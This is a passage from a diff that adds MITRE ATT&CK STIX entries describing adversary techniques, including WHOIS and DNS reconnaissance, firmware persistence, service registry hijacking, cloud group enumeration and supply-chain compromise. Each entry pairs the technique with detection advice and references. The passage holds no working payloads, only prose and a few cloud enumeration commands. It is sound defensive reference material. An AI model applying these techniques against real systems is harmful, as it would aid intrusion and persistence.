"attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "created": "2020-02-11T18:42:07.281Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/002", + "external_id": "T1003.002" + }, + { + "source_name": "GitHub Creddump7", + "description": "Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018.", + "url": "https://github.com/Neohapsis/creddump7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "WHOIS", + "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "created": "2020-10-02T16:56:49.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1596/002", + "external_id": "T1596.002" + }, + { + "source_name": "WHOIS", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", + "url": "https://www.whois.net/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:21:51.311Z", + "name": "System Firmware", + "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jean-Ian Boutin, ESET", + "McAfee", + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host intrusion prevention systems", + "Anti-virus", + "File monitoring" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "created": "2019-12-19T19:43:34.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/001", + "external_id": "T1542.001" + }, + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + }, + { + "source_name": "About UEFI", + "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.", + "url": "http://www.uefi.org/about" + }, + { + "source_name": "MITRE Trustworthy Firmware Measurement", + "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", + "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + }, + { + "source_name": "Wikipedia UEFI", + "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.", + "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface" + }, + { + "source_name": "Wikipedia BIOS", + "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.", + "url": "https://en.wikipedia.org/wiki/BIOS" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Search Victim-Owned Websites", + "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", + "created": "2020-10-02T16:51:50.306Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1594", + "external_id": "T1594" + }, + { + "source_name": "Comparitech Leak", + "description": "Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020.", + "url": "https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Cloud Groups", + "description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Regina Elwell", + "Isif Ibrahima, Mandiant" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "created": "2020-02-21T21:15:33.222Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069/003", + "external_id": "T1069.003" + }, + { + "source_name": "AWS Get Bucket ACL", + "description": "Amazon Web Services. (n.d.). Retrieved May 28, 2021.", + "url": "https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html" + }, + { + "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022", + "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.", + "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/" + }, + { + "source_name": "Black Hills Red Teaming MS AD Azure, 2018", + "description": "Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.", + "url": "https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/" + }, + { + "source_name": "Google Cloud Identity API Documentation", + "description": "Google. (n.d.). Retrieved March 16, 2021.", + "url": "https://cloud.google.com/identity/docs/reference/rest" + }, + { + "source_name": "Microsoft AZ CLI", + "description": "Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest" + }, + { + "source_name": "Microsoft Msolrole", + "description": "Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0" + }, + { + "source_name": "GitHub Raindance", + "description": "Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.", + "url": "https://github.com/True-Demon/raindance" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Services Registry Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)\n\nThe Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\n\nAdversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicename\\Parameters\\ServiceDll.(Citation: malware_hides_service)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Matthew Demaske, Adaptforward" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "created": "2020-03-13T11:42:14.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/011", + "external_id": "T1574.011" + }, + { + "source_name": "Tweet Registry Perms Weakness", + "description": "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", + "url": "https://twitter.com/r0wdy_/status/936365549553991680" + }, + { + "source_name": "insecure_reg_perms", + "description": "Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.", + "url": "https://itm4n.github.io/windows-registry-rpceptmapper-eop/" + }, + { + "source_name": "Kansa Service related collectors", + "description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", + "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" + }, + { + "source_name": "malware_hides_service", + "description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.", + "url": "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/" + }, + { + "source_name": "Autoruns for Windows", + "description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" + }, + { + "source_name": "Registry Key Security", + "description": "Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN" + }, + { + "source_name": "microsoft_services_registry_tree", + "description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" + }, + { + "source_name": "troj_zegost", + "description": "Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "DNS/Passive DNS", + "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "created": "2020-10-02T16:57:45.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1596/001", + "external_id": "T1596.001" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Application Exhaustion Flood", + "description": "Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "created": "2020-02-20T15:35:00.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1499/003", + "external_id": "T1499.003" + }, + { + "source_name": "Arbor AnnualDoSreport Jan 2018", + "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", + "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Rc.common", + "description": "During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.\n\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "The /etc/rc.common file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1163", + "external_id": "T1163" + }, + { + "source_name": "Startup Items", + "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-13T14:47:31.204Z", + "name": "Compromise Software Dependencies and Development Tools", + "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "created": "2020-03-11T14:13:42.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1195/001", + "external_id": "T1195.001" + }, + { + "source_name": "Trendmicro NPM Compromise", + "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.", + "url": "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Digital Certificates", + "description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from 